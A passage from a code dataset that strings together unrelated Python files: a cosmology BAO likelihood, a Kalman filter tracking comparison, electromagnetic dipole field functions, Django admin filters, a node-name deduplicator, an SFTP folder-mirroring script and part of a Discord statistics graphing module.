conts\nfrom scipy import interpolate as itp\nfrom scipy.interpolate import RectBivariateSpline\n\nclass bao_eBOSS_DR16_gal_QSO(Likelihood):\n\n # initialization routine\n\n def __init__(self, path, data, command_line):\n\n Likelihood.__init__(self, path, data, command_line)\n\n # are there conflicting experiments?\n conflicting_experiments = [\n 'bao', 'bao_boss', 'bao_known_rs', 'bao_angular',\n 'bao_boss_aniso', 'bao_boss_aniso_gauss_approx',\n 'bao_boss_dr12', 'bao_fs_boss_dr12', 'bao_fs_boss_dr12_twobins',\n 'bao_fs_eBOSS_DR16_QSO', 'bao_fs_eBOSS_DR16_LRG']\n for experiment in conflicting_experiments:\n if experiment in data.experiments:\n raise io_mp.LikelihoodError(\n 'bao_eBOSS_DR16_gal_QSO reports conflicting BAO measurments from: %s' %(experiment))\n\n # define arrays for values of z and data points DM/r_s and DH/r_s.\n self.z = np.array([], 'float64')\n self.DM_over_rs = np.array([], 'float64')\n self.DH_over_rs = np.array([], 'float64')\n\n # Counting the number of data point\n # in LRG dr16 and QSO.\n lrg_dr16_points = 0\n qso_dr16_points = 0\n\n # Loadind the data depending on the datasets asked in the param file.\n # By defualt all the datasets are loaded.\n if self.lrg_dr12:\n print(\"BOSS LRG DR12 = \" + str(self.lrg_dr12))\n with open(os.path.join(self.data_directory, self.lrg_dr12_data_file), 'r') as filein:\n for i, line in enumerate(filein):\n if line.strip() and line.find('#') == -1:\n this_line = line.split()\n # load redshifts\n self.z = np.append(self.z, float(this_line[0]))\n # load D_M / rs\n if this_line[2] == 'DM_over_rs':\n self.DM_over_rs = np.append(\n self.DM_over_rs, float(this_line[1]))\n # load D_H/rs\n elif this_line[2] == 'DH_over_rs':\n self.DH_over_rs = np.append(\n self.DH_over_rs, float(this_line[1]))\n\n lrg_dr12_points = i\n if self.lrg_dr16:\n print(\"eBOSS LRG DR16 = \" + str(self.lrg_dr16))\n with open(os.path.join(self.data_directory, self.lrg_dr16_data_file), 'r') as filein:\n for i, line in enumerate(filein):\n if line.strip() and line.find('#') == -1:\n this_line = line.split()\n # load redshifts\n self.z = np.append(self.z, float(this_line[0]))\n # load and D_M / rs\n if this_line[2] == 'DM_over_rs':\n self.DM_over_rs = np.append(\n self.DM_over_rs, float(this_line[1]))\n # load D_H/rs\n elif this_line[2] == 'DH_over_rs':\n self.DH_over_rs = np.append(\n self.DH_over_rs, float(this_line[1]))\n # Counting the total number of datasets in LRG DR16 dataset. Important to set\n # the covariance matrix in the right order.\n lrg_dr16_points = i\n if self.qso_dr16:\n print(\"eBOSS QSO = \" + str(self.qso_dr16))\n if ('sdssdr16_lyauto') in data.experiments:\n if not 'sdssdr16_lyaxqso' in data.experiments:\n print(\"If you include QSO dataset in the 'sdssdr16_gal_qso' AND ly-alpha autocorrelation,\" +\n \"we highly recommend to take into account the crosscorrelation of the two dataset i.e. \" +\n \"include also the likelihood sdssdr16_lyaxqso likelihood.\")\n\n with open(os.path.join(self.data_directory, self.qso_data_file), 'r') as filein:\n for i, line in enumerate(filein):\n if line.strip() and line.find('#') == -1:\n this_line = line.split()\n # load redshift\n self.z = np.append(self.z, float(this_line[0]))\n # load D_M / rs\n if this_line[2] == 'DM_over_rs':\n self.DM_over_rs = np.append(\n self.DM_over_rs, float(this_line[1]))\n # load D_H/rs\n elif this_line[2] == 'DH_over_rs':\n self.DH_over_rs = np.append(\n self.DH_over_rs, float(this_line[1]))\n # Counting the total number of datasets in QSO datasets. Important to set\n # the covariance matrix in the right order.\n qso_dr16_points = i\n # Pick out the unique redshifts from the datafiles.\n self.z = np.unique(self.z)\n # Number of bins\n self.num_bins = np.shape(self.z)[0]\n # Number of data points\n self.num_points = 2*self.num_bins\n\n # Read covariance matrix and set them according to the chosen dataset\n self.cov_data = np.zeros((self.num_points,self.num_points), 'float64')\n if self.lrg_dr12:\n self.cov_data = np.loadtxt(os.path.join(self.data_directory, self.lrg_dr12_cov_file))\n if self.lrg_dr16:\n # Check if LRG DR12 covariance has already been loaded in the covaraince matrix...\n if np.all(self.cov_data == 0):\n # If not, load the LRG DR16 dataset.\n self.cov_data = np.loadtxt(os.path.join(self.data_directory, self.lrg_dr16_cov_file))\n else:\n # If LRG DR12 covariance matrix alreadt exists then change the size of the covariance matrix\n # and then add the LRG DR16 coavariance matrix along the digonal with LRG DR12.\n cov_data_Temp = self.cov_data\n self.cov_data = np.zeros((np.shape(cov_data_Temp)[0] +\n (lrg_dr16_points + 1), np.shape(cov_data_Temp)[0]\n + (lrg_dr16_points + 1)))\n self.cov_data[0:np.shape(cov_data_Temp)[0],0:np.shape(cov_data_Temp)[0]] = cov_data_Temp\n self.cov_data[np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (lrg_dr16_points + 1),np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (lrg_dr16_points + 1)] = np.loadtxt(os.path.join(self.data_directory, self.lrg_dr16_cov_file))\n # Same as above but for QSO covariance matrix. Check, read and adjust the covariance matrix.\n if self.qso_dr16:\n if np.all(self.cov_data == 0):\n self.cov_data = np.loadtxt(os.path.join(self.data_directory, self.qso_cov_file))\n else:\n cov_data_Temp = self.cov_data\n self.cov_data = np.zeros((np.shape(cov_data_Temp)[0] +\n (qso_dr16_points + 1), np.shape(cov_data_Temp)[0]\n + (qso_dr16_points + 1)))\n self.cov_data[0:np.shape(cov_data_Temp)[0],0:np.shape(cov_data_Temp)[0]] = cov_data_Temp\n self.cov_data[np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (qso_dr16_points + 1),np.shape(cov_data_Temp)[0]:np.shape(cov_data_Temp)[0] +\n (qso_dr16_points + 1)] = np.loadtxt(os.path.join(self.data_directory, self.qso_cov_file))\n\n # compute likelihood\n def loglkl(self, cosmo, data):\n loglkl = 0.0\n\n # define array for values of D_M_diff = D_M^th - D_M^obs and H_diff = H^th - H^obs,\n # ordered by redshift bin (z=[0.38, 0.51, 0.61]) as following:\n # data_array = [DM_diff(z=0.38), H_diff(z=0.38), DM_diff(z=0.51), .., .., ..]\n data_array = np.array([], 'float64')\n # for each point, compute comoving angular diameter distance D_M = (1 + z) * D_A,\n # sound horizon at baryon drag rs_d, theoretical prediction\n for i in range(self.num_bins):\n DM_at_z = cosmo.angular_distance(self.z[i]) * (1. + self.z[i])\n H_at_z = cosmo.Hubble(self.z[i])\n DH_at_z = 1.0/H_at_z\n rd = cosmo.rs_drag() * self.rs_rescale\n\n theo_DM_at_z = DM_at_z / rd\n theo_DH_at_z_in_Mpc_inv = DH_at_z / rd\n\n # calculate difference between the sampled point and observations\n DM_diff = theo_DM_at_z - self.DM_over_rs[i]\n H_diff = theo_DH_at_z_in_Mpc_inv - self.DH_over_rs[i]\n\n # save to data array\n data_array = np.append(data_array, DM_diff)\n data_array = np.append(data_array, H_diff)\n\n # compute chi squared\n inv_cov_data = np.linalg.inv(self.cov_data)\n chi2 = np.dot(np.dot(data_array,inv_cov_data),data_array)\n\n # return ln(L)\n loglkl = - 0.5 * chi2\n\n return loglkl\n","sub_path":"montepython/likelihoods/bao_eBOSS_DR16_gal_QSO/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"48830729","text":"import numpy as np\nfrom math import *\nfrom tqdm import tqdm\n\n#Lagrange interpolation\ndef lagrange(x,xx,yy):\n '''Performs Lagrange interpolation to find polynomial fit for measurements.\n\n x : Current x to compute interpolation for.\n xx : Array of x measurements.\n yy : Array of y measurements.'''\n\n output=0\n for k in range(xx.shape[0]):\n lk=1\n for j in range(xx.shape[0]):\n if j!=k:\n lk = lk*(x-xx[j])/(xx[k]-xx[j])\n output += yy[k]*lk\n return output\n\n#Kalman filtering\ndef kalman_update(x, P, F, B, u, Q, measurement, z, R, H):\n '''Performs one step of Kalman filter update (with measurements if provided).\n\n x : Current state estimate vector.\n P : Current state covariance matrix.\n F : State transition matrix.\n B : Control matrix.\n u : Control vector.\n Q : State uncertainty matrix.\n z : Current measured state vector.\n R : Measured state uncertainty matrix.\n H : Mapping matrix from states to measurements (not needed).'''\n\n assert x.shape == (6,1)\n assert P.shape == (6,6)\n assert F.shape == (6,6)\n\n xhat = np.matmul(F, x) + np.matmul(B, u)\n Phat = np.matmul(F, np.matmul(P, F.T)) + Q\n\n if measurement==0:\n return xhat, Phat\n\n else:\n Kprime = np.matmul(P, np.matmul(H.T, np.linalg.inv(np.matmul(H, np.matmul(P, H.T)) + R)))\n xhatprime = xhat + np.matmul(Kprime, z - np.matmul(H, xhat))\n Phatprime = Phat - np.matmul(Kprime, np.matmul(H, P))\n\n return xhatprime, Phatprime\n\ndef solve(measurements, measurements_uncertainty, measurements_idx, initx, initP, F, B, u, Q, N, H=np.eye(6)):\n '''Returns the state estimations given measurements and state dynamics.\n\n measurements : Matrix where each row is the state measurements. 0 if not available.\n measurements_uncertainty : Measurement uncertainties. 0 if not available.\n measurements_idx : Length N array holding 1 if that time index has a measurement.\n initx : Mean for states estimate at time 0.\n initP : Covariance for states estimate at time 0.\n F : State transition matrix.\n B : Control matrix.\n u : Control vector.\n Q : State uncertainty matrix.\n N : Number of time indices.\n H : Mapping matrix from states to measurements (not needed).'''\n\n x_sol = [initx]\n P_sol = [initP]\n\n for k in range(N):\n x_now, P_now = kalman_update(x_sol[-1].reshape(-1,1), P_sol[-1], F, B, u, Q, \\\n measurements_idx[k], measurements[k].reshape(-1,1), measurements_uncertainty, H)\n\n x_sol.append(x_now.flatten())\n P_sol.append(P_now)\n\n return np.array(x_sol), np.array(P_sol)\n\ndef generate_data(xinit, vinit, delta, N, prop, noise):\n '''Generate true and noisy 3D data.\n\n xinit : 3D array of initial x,y,z positions.\n vinit : 3D array of initial x,y,z velocities.\n delta : Time delta.\n N : Number of time indices to consider.\n prop : Proportion of N, indicates how many noisy measurements to generate.\n noise : Variance of added noise.'''\n\n x = [xinit[0]]\n y = [xinit[1]]\n z = [xinit[2]]\n velx = [vinit[0]]\n vely = [vinit[1]]\n velz = [vinit[2]]\n idx = np.zeros(N)\n\n for k in range(N):\n x.append(x[-1] + velx[-1]*delta)\n y.append(y[-1] + vely[-1]*delta)\n z.append(z[-1] + velz[-1]*delta - 0.5*9.81*delta**2)\n velx.append(velx[-1])\n vely.append(vely[-1])\n velz.append(velz[-1] - 9.81*delta)\n if k % int(prop*N) == 0:\n idx[k] = 1\n\n actual = np.vstack((np.array(x),np.array(y),np.array(z),np.array(velx),np.array(vely),np.array(velz)))\n noisy = actual.T + noise*np.random.randn(N+1, 6)\n\n return idx, actual.T, noisy\n\n\n# Initialisations\nxinit = np.array([0,0,0])\nvinit = np.array([100,100,100])\ndelta = 0.1\nN = 204\nprop = 0.1\nnoise = 10\nstate_unc = 40\n\n# Matrices for kalman updates\nF = np.array([[1,0,0,delta,0,0],\n [0,1,0,0,delta,0],\n [0,0,1,0,0,delta],\n [0,0,0,1,0,0],\n [0,0,0,0,1,0],\n [0,0,0,0,0,1]])\n\nB = np.array([0,0,0.5*delta**2,0,0,delta]).reshape(-1,1)\nu = np.array([-9.81]).reshape(-1,1)\n\n#### GET MSEs ####\n\nnum_trials = 1000\nlagrange_results = []\nkalman_results = []\n\nfor n in tqdm(range(num_trials)):\n measurements_idx, actual, measurements = generate_data(xinit, vinit, delta, N, prop, noise)\n\n #Lagrange\n yy=np.array([lagrange(x,measurements[1:][measurements_idx==1][:,0],\\\n measurements[1:][measurements_idx==1][:,2]) for x in actual[:, 0]])\n lagrange_results.append(np.mean((yy-actual[:, 2])**2))\n\n #Kalman\n x, P = solve(measurements, noise*np.eye(6), measurements_idx, np.array([0,0,0,100,100,100]), \\\n np.eye(6), F, B, u, state_unc*np.eye(6), N, H=np.eye(6))\n kalman_results.append(np.mean((x[:, 2]-actual[:, 2])**2))\n\nprint('Lagrange MSEs mean : ', np.mean(lagrange_results))\nprint('Lagrange MSEs std : ', np.std(lagrange_results))\nprint('Kalman MSEs mean : ', np.mean(kalman_results))\nprint('Kalman MSEs std : ', np.std(kalman_results))\n","sub_path":"tracking_comp.py","file_name":"tracking_comp.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"240692330","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom .base import BaseElectricDipole, BaseFDEM\n\nfrom scipy.constants import mu_0, pi, epsilon_0\nimport numpy as np\nimport warnings\n\n\nclass ElectricDipole_WholeSpace(BaseElectricDipole, BaseFDEM):\n\n def electric_field(self, xyz, **kwargs):\n pass\n\n\ndef E_from_EDWS(XYZ, srcLoc, sig, f, current=1., length=1., orientation='X', kappa=0., epsr=1., t=0.):\n \"\"\"E_from_EDWS\n Computing the analytic electric fields (E) from an electrical dipole in a wholespace\n - You have the option of computing E for multiple frequencies at a single reciever location\n or a single frequency at multiple locations\n\n :param numpy.array XYZ: reciever locations at which to evaluate E\n :param float epsr: relative permitivitty value (unitless), default is 1.0\n :rtype: numpy.array\n :return: Ex, Ey, Ez: arrays containing all 3 components of E evaluated at the specified locations and frequencies.\n \"\"\"\n\n mu = mu_0*(1+kappa)\n epsilon = epsilon_0*epsr\n sig_hat = sig + 1j*omega(f)*epsilon\n\n XYZ = Utils.asArray_N_x_Dim(XYZ, 3)\n # Check\n if XYZ.shape[0] > 1 & f.shape[0] > 1:\n raise Exception('I/O type error: For multiple field locations only a single frequency can be specified.')\n\n dx = XYZ[:, 0] - srcLoc[0]\n dy = XYZ[:, 1] - srcLoc[1]\n dz = XYZ[:, 2] - srcLoc[2]\n\n r = np.sqrt(dx**2. + dy**2. + dz**2.)\n # k = np.sqrt( -1j*2.*pi*f*mu*sig )\n k = np.sqrt(omega(f)**2. * mu * epsilon - 1j * omega(f) * mu * sig)\n\n front = current * length / (4.*pi*sig_hat* r**3) * np.exp(-1j*k*r)\n mid = -k**2 * r**2 + 3*1j*k*r + 3\n\n if orientation.upper() == 'X':\n Ex = front*((dx**2 / r**2)*mid + (k**2 * r**2 -1j*k*r-1.))\n Ey = front*(dx*dy / r**2)*mid\n Ez = front*(dx*dz / r**2)*mid\n return Ex, Ey, Ez\n\n elif orientation.upper() == 'Y':\n # x--> y, y--> z, z-->x\n Ey = front*((dy**2 / r**2)*mid + (k**2 * r**2 -1j*k*r-1.))\n Ez = front*(dy*dz / r**2)*mid\n Ex = front*(dy*dx / r**2)*mid\n return Ex, Ey, Ez\n\n elif orientation.upper() == 'Z':\n # x --> z, y --> x, z --> y\n Ez = front*((dz**2 / r**2)*mid + (k**2 * r**2 -1j*k*r-1.))\n Ex = front*(dz*dx / r**2)*mid\n Ey = front*(dz*dy / r**2)*mid\n return Ex, Ey, Ez\n\n\ndef MagneticDipoleFields(srcLoc, obsLoc, component, orientation='Z', moment=1., mu=mu_0):\n \"\"\"\n Calculate the vector potential of a set of magnetic dipoles\n at given locations 'ref. '\n\n .. math::\n\n B = \\frac{\\mu_0}{4 \\pi r^3} \\left( \\frac{3 \\vec{r} (\\vec{m} \\cdot\n \\vec{r})}{r^2})\n - \\vec{m}\n \\right) \\cdot{\\hat{rx}}\n\n :param numpy.ndarray srcLoc: Location of the source(s) (x, y, z)\n :param numpy.ndarray obsLoc: Where the potentials will be calculated\n (x, y, z)\n :param str component: The component to calculate - 'x', 'y', or 'z'\n :param numpy.ndarray moment: The vector dipole moment (vertical)\n :rtype: numpy.ndarray\n :return: The vector potential each dipole at each observation location\n \"\"\"\n\n if isinstance(orientation, str):\n assert orientation.upper() in ['X', 'Y', 'Z'], (\n \"orientation must be 'x', 'y', or 'z' or a vector not {}\"\n .format(orientation)\n )\n elif (not np.allclose(np.r_[1., 0., 0.], orientation) or\n not np.allclose(np.r_[0., 1., 0.], orientation) or\n not np.allclose(np.r_[0., 0., 1.], orientation)):\n warnings.warn(\n 'Arbitrary trasnmitter orientations ({}) not thouroughly tested '\n 'Pull request on a test anyone? bueller?'.format(orientation)\n )\n\n if isinstance(component, str):\n assert component.upper() in ['X', 'Y', 'Z'], (\n \"component must be 'x', 'y', or 'z' or a vector not {}\"\n .format(component)\n )\n elif (not np.allclose(np.r_[1., 0., 0.], component) or\n not np.allclose(np.r_[0., 1., 0.], component) or\n not np.allclose(np.r_[0., 0., 1.], component)):\n warnings.warn(\n 'Arbitrary receiver orientations ({}) not thouroughly tested '\n 'Pull request on a test anyone? bueller?'\n ).format(component)\n\n if isinstance(orientation, str):\n orientation = orientationDict[orientation.upper()]\n\n if isinstance(component, str):\n component = orientationDict[component.upper()]\n\n assert np.linalg.norm(orientation, 2) == 1., (\n \"orientation must be a unit vector. \"\n \"Use 'moment=X to scale source fields\"\n )\n\n if np.linalg.norm(component, 2) != 1.:\n warnings.warn(\n 'The magnitude of the receiver component vector is > 1, '\n ' it is {}. The receiver fields will be scaled.'\n .format(np.linalg.norm(component, 2))\n )\n\n srcLoc = np.atleast_2d(srcLoc)\n component = np.atleast_2d(component)\n obsLoc = np.atleast_2d(obsLoc)\n orientation = np.atleast_2d(orientation)\n\n nObs = obsLoc.shape[0]\n nSrc = int(srcLoc.size / 3.)\n\n # use outer product to construct an array of [x_src, y_src, z_src]\n\n m = moment*orientation.repeat(nObs, axis=0)\n B = []\n\n for i in range(nSrc):\n srcLoc = srcLoc[i, np.newaxis].repeat(nObs, axis=0)\n rx = component.repeat(nObs, axis=0)\n dR = obsLoc - srcLoc\n r = np.sqrt((dR**2).sum(axis=1))\n\n # mult each element and sum along the axis (vector dot product)\n m_dot_dR_div_r2 = (m * dR).sum(axis=1) / (r**2)\n\n # multiply the scalar m_dot_dR by the 3D vector r\n rvec_m_dot_dR_div_r2 = np.vstack([m_dot_dR_div_r2 * dR[:, i] for\n i in range(3)]).T\n inside = (3. * rvec_m_dot_dR_div_r2) - m\n\n # dot product with rx orientation\n inside_dot_rx = (inside * rx).sum(axis=1)\n front = (mu/(4.* pi * r**3))\n\n B.append(Utils.mkvc(front * inside_dot_rx))\n\n return np.vstack(B).T\n","sub_path":"geoana/em/fdem.py","file_name":"fdem.py","file_ext":"py","file_size_in_byte":6313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"593989183","text":"# encoding: utf-8\r\n\r\nfrom django.db import models\r\nfrom django.contrib.admin.filterspecs import FilterSpec, ChoicesFilterSpec, RelatedFilterSpec\r\nfrom django.utils.encoding import smart_unicode\r\nfrom django.utils.translation import ugettext as _\r\n\r\n\r\n\r\nclass CategoryAdminFilter(FilterSpec):\r\n def __init__(self, f, request, params, model, model_admin, field_path=None):\r\n self.lookup_val = request.GET.get('parent', None)\r\n self.field = f\r\n\r\n self.lookup_choices = model.objects.filter(parent__id=self.lookup_val)\r\n\r\n def get_query_set(self, cl, qs):\r\n if self.lookup_val:\r\n qs = qs.filter(parent__id=self.lookup_val)\r\n \r\n return qs\r\n\r\n def choices(self, cl):\r\n yield {'selected': self.lookup_val is None,\r\n 'query_string': cl.get_query_string({}, [self.field.name]),\r\n 'display': _('All')}\r\n\r\n if len(self.lookup_choices) > 0:\r\n for choice in self.lookup_choices:\r\n yield {'selected': self.lookup_val == choice.id,\r\n 'query_string': cl.get_query_string({self.field.name: choice.id}),\r\n 'display': \"%s %s\" % (smart_unicode(choice), \" (\" + smart_unicode(choice.category_set.count()) + \")\")\r\n }\r\n\r\n\r\n'''\r\nUrun provider_stock_code a gore filtreleme\r\nbu alan dolu ise urun manuel eklenmemis xml den eklenmistir.\r\n'''\r\nclass ProductAdminFilter(FilterSpec):\r\n def __init__(self, f, request, params, model, model_admin, field_path=None):\r\n self.lookup_val = request.GET.get('provider_stock_code__isnull', None)\r\n self.field = f\r\n\r\n def choices(self, cl):\r\n yield {'selected': self.lookup_val is None,\r\n 'query_string': cl.get_query_string({}, [self.field.name]),\r\n 'display': _('All')\r\n }\r\n \r\n yield {'selected': self.lookup_val == 'True',\r\n 'query_string': cl.get_query_string({'provider_stock_code__isnull': True}, [self.field.name]),\r\n 'display': _('Yes')\r\n }\r\n \r\n yield {'selected': self.lookup_val == 'False',\r\n 'query_string': cl.get_query_string({'provider_stock_code__isnull': False}, [self.field.name]),\r\n 'display': _('No')\r\n }\r\n\r\n def title(self):\r\n return \"Manuel Eklenenler\"\r\n\r\n\r\n\r\nFilterSpec.filter_specs.insert(1, (lambda f: getattr(f, 'product_admin_filter', False), ProductAdminFilter))\r\nFilterSpec.filter_specs.insert(0, (lambda f: bool(f.rel and hasattr(f, 'category_admin_filter')), CategoryAdminFilter))\r\n#FilterSpec.filter_specs.insert(0, (lambda f: getattr(f, 'category_admin_filter', False), CategoryAdminFilter))\r\n\r\n","sub_path":"product/customfilters.py","file_name":"customfilters.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"437529416","text":"'''\nCreated on Mar 12, 2013\n\n@author: Giacomo Mc Evoy\n'''\n\nimport sys\nimport re\n\ndef run():\n \n # Read filename from args\n filename = sys.argv[1]\n\n # open file and read it\n aFile = open(filename, 'r')\n text = aFile.read()\n \n # get the repeated filenames\n repeatedNames = re.split('\\\\n', text)\n \n # work on repeated filenames\n names = unique(repeatedNames)\n\n # output to another file\n outputName = sys.argv[2]\n output = open(outputName, 'w')\n writeNames(output, names)\n \ndef unique(repeatedNames):\n uniques = []\n \n # boundary condition: empty list\n if len(repeatedNames) == 0:\n return uniques\n \n # sort makes things easier\n repeatedNames = sorted(repeatedNames)\n\n # add the rest\n for s in repeatedNames:\n\n # condition of empty name (due to split)\n if len(s) == 0:\n continue\n\n # boundary condition for first element \n if len(uniques) == 0:\n uniques.append(s)\n continue\n \n # add the rest \n size = len(uniques)\n if uniques[size - 1] != s:\n # this node name has not been added yet\n uniques.append(s);\n \n return uniques;\n\ndef writeNames(output, names):\n \n for name in names:\n output.write(name + '\\n')\n output.close()\n\n# Do this when attempting to run module\nif __name__ == '__main__':\n run()\n","sub_path":"monitor/nodenames.py","file_name":"nodenames.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"559761322","text":"import paramiko\nfrom threading import Timer\nimport os, os.path as op, pathlib, fnmatch\nfrom datetime import datetime\n\nfrom ssh_credentials import SSH_USER, SSH_PORT, SSH_HOST, SSH_KEY\n\nREMOTE_FOLDER = '/tmp/remdeb/'\nLOCAL_FOLDER = 'D:\\\\edu\\\\UniBonn\\\\Study\\\\thesis\\\\codes\\\\NSVF\\\\remdeb\\\\'\nINTERVAL = 5 # in seconds\n\nFILTER = '*.rmdb'\n\n\n# Start connection\nclient = paramiko.SSHClient()\nclient.load_system_host_keys()\nclient.load_host_keys(SSH_KEY)\nclient.connect(SSH_HOST, SSH_PORT, SSH_USER)\nsftp = client.open_sftp()\n\n# Change dir to remote_folder or create if not existing\ntry:\n\tsftp.chdir(REMOTE_FOLDER)\nexcept IOError:\n\tsftp.mkdir(REMOTE_FOLDER)\n\tsftp.chdir(REMOTE_FOLDER)\n\n# Prepare local directory\nif not op.exists(LOCAL_FOLDER):\n\tos.makedirs(LOCAL_FOLDER)\n\nfileList = {f: pathlib.Path(op.join(LOCAL_FOLDER, f)).stat() \\\n\t\t\tfor f in os.listdir(LOCAL_FOLDER) if op.isfile(op.join(LOCAL_FOLDER, f))}\n\n# Function of watchdog to be executed each INTERVAL seconds\ndef watchFolder():\n\tprint(datetime.now().strftime(\"%H:%M:%S\"))\n\tTimer(INTERVAL, watchFolder).start()\n\n\tremoteDir = {f: sftp.lstat(f) for f in sftp.listdir()}\n\n\tfor f in remoteDir:\n\t\tlstat = remoteDir[f]\n\t\t# Only filter files\n\t\tif 'd' in str(lstat).split()[0] or not fnmatch.fnmatch(f, FILTER):\n\t\t\tcontinue\n\n\t\tif f not in fileList or fileList[f].st_mtime < lstat.st_mtime:\n\t\t\tprint('> {}'.format(f))\n\t\t\tsftp.get(op.join(REMOTE_FOLDER, f), op.join(LOCAL_FOLDER, f))\n\t\t\tfileList.update({f: pathlib.Path(op.join(LOCAL_FOLDER, f)).stat()})\n\nwatchFolder()","sub_path":"util/remote_debugger/mirror_folder.py","file_name":"mirror_folder.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"333087586","text":"\nimport sys\n\nimport matplotlib.patches as mpatches\nfrom Core.Fonctions.GetNom import getNomGraph\nfrom Core.Fonctions.GraphTheme import setThemeGraph\nfrom Core.Fonctions.VoiceAxe import voiceAxe\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches\nfrom Stats.SQL.ConnectSQL import connectSQL\n\ncolorOT=(110/256,200/256,250/256,1)\ntableauMois={\"01\":\"janvier\",\"02\":\"février\",\"03\":\"mars\",\"04\":\"avril\",\"05\":\"mai\",\"06\":\"juin\",\"07\":\"juillet\",\"08\":\"aout\",\"09\":\"septembre\",\"10\":\"octobre\",\"11\":\"novembre\",\"12\":\"décembre\",\"TO\":\"TOTAL\",\"1\":\"janvier\",\"2\":\"février\",\"3\":\"mars\",\"4\":\"avril\",\"5\":\"mai\",\"6\":\"juin\",\"7\":\"juillet\",\"8\":\"aout\",\"9\":\"septembre\",\"janvier\":\"01\",\"février\":\"02\",\"mars\":\"03\",\"avril\":\"04\",\"mai\":\"05\",\"juin\":\"06\",\"juillet\":\"07\",\"aout\":\"08\",\"septembre\":\"09\",\"octobre\":\"10\",\"novembre\":\"11\",\"décembre\":\"12\",\"to\":\"TO\",\"glob\":\"GL\"}\ndictYAx={\"Salons\":\"Salons\",\"Freq\":\"Heures\",\"Emotes\":\"Emotes\",\"Reactions\":\"Réactions\",\"Voicechan\":\"Salons\",\"Messages\":\"Membres\",\"Voice\":\"Membres\",\"Mots\":\"Membres\"}\n\ndef graphGroupedCompare(ligne,ctx,option,bot,guildOT,curseur):\n colors={ligne[\"AuthorID\"]:colorOT,int(ligne[\"Args4\"]):colorOT}\n noms={ligne[\"AuthorID\"]:\"Ancien membre\",int(ligne[\"Args4\"]):\"Ancien membre\"}\n author,table=ligne[\"AuthorID\"],ligne[\"AuthorID\"]\n table=curseur.execute(\"SELECT * FROM perso{0}{1}{2} ORDER BY Count DESC LIMIT 10\".format(ligne[\"Args2\"],ligne[\"Args3\"],ligne[\"AuthorID\"])).fetchall()\n listeX,listeY,listeSN,listeSX,listeA=[],[],[],[],[]\n pos=0\n setThemeGraph(plt)\n plt.subplots(figsize=(6.4,4.8))\n for i in range(len(table)):\n if option in (\"Salons\",\"Voicechan\"):\n if guildOT.chan[table[i][\"ID\"]][\"Hide\"]:\n continue\n center=0\n listeX.append(pos)\n listeY.append(table[i][\"Count\"])\n listeA.append(author)\n pos+=1\n center+=1\n\n count=curseur.execute(\"SELECT * FROM perso{0}{1}{2} WHERE ID={3}\".format(ligne[\"Args2\"],ligne[\"Args3\"],ligne[\"Args4\"],table[i][\"ID\"])).fetchone()\n if count!=None:\n listeY.append(count[\"Count\"])\n listeA.append(int(ligne[\"Args4\"]))\n listeX.append(pos)\n pos+=1\n center+=1\n\n listeSX.append(pos-center//2-1)\n try:\n listeSN.append(getNomGraph(ctx,bot,option,table[i][\"ID\"]))\n except:\n listeSN.append(\"??\")\n pos+=0.75\n\n voiceAxe(option,listeY,plt,\"y\")\n user1=ctx.guild.get_member(author)\n user2=ctx.guild.get_member(int(ligne[\"Args4\"]))\n\n if user1!=None:\n colors[user1.id]=(user1.color.r/256,user1.color.g/256,user1.color.b/256,1)\n noms[user1.id]=user1.name\n if user2!=None:\n colors[user2.id]=(user2.color.r/256,user2.color.g/256,user2.color.b/256,1)\n noms[user2.id]=user2.name\n\n if colors[ligne[\"AuthorID\"]]==colors[int(ligne[\"Args4\"])]:\n colors[int(ligne[\"Args4\"])]=(colors[int(ligne[\"Args4\"])][0],colors[int(ligne[\"Args4\"])][1],colors[int(ligne[\"Args4\"])][2],0.5)\n\n plt.bar(listeX, listeY, color=[colors[i] for i in listeA], width=1, edgecolor='white')\n plt.xticks(listeSX, listeSN,rotation=45)\n plt.xlabel(dictYAx[option])\n\n for i in range(len(listeY)):\n plt.text(x=listeX[i], y=listeY[i], s=listeY[i], size=8, ha=\"center\")\n\n plt.legend([matplotlib.patches.Patch(color=colors[ligne[\"AuthorID\"]]),matplotlib.patches.Patch(color=colors[int(ligne[\"Args4\"])])],[noms[ligne[\"AuthorID\"]],noms[int(ligne[\"Args4\"])]])\n\n if table[0][\"Annee\"]==\"GL\":\n titre=\"Classement global - {0} - {1}\".format(ctx.guild.name,option) \n else:\n titre=\"Classement {0} 20{1} - {2} - {3}\".format(tableauMois[table[0][\"Mois\"]],table[0][\"Annee\"],ctx.guild.name,option)\n\n plt.title(\"Groupement comparaison\\n{0} - {1}/{2}\".format(option,ligne[\"Args2\"],ligne[\"Args3\"]))\n plt.tight_layout()\n plt.savefig(\"Graphs/otGraph\")\n plt.clf()\n\n\n\ndef graphGroupedComparePerso(ligne,ctx,option,bot,guildOT):\n liste1=ligne[\"Args1\"].split(\" \")\n liste2=ligne[\"Args2\"].split(\" \")\n colors=[colorOT,\"green\"]\n \n author=ligne[\"AuthorID\"]\n obj=ligne[\"Args3\"]\n if obj==\"None\":\n obj=\"\"\n tempOption=option\n if obj!=\"\":\n if option==\"Voicechan\":\n option=\"Voice\"\n else:\n option=\"Messages\"\n\n if ligne[\"Commande\"]==\"compareServ\":\n noms=[\"{0}/{1}\".format(tableauMois[liste1[0]],liste1[1]),\"{0}/{1}\".format(tableauMois[liste2[0]],liste2[1])]\n 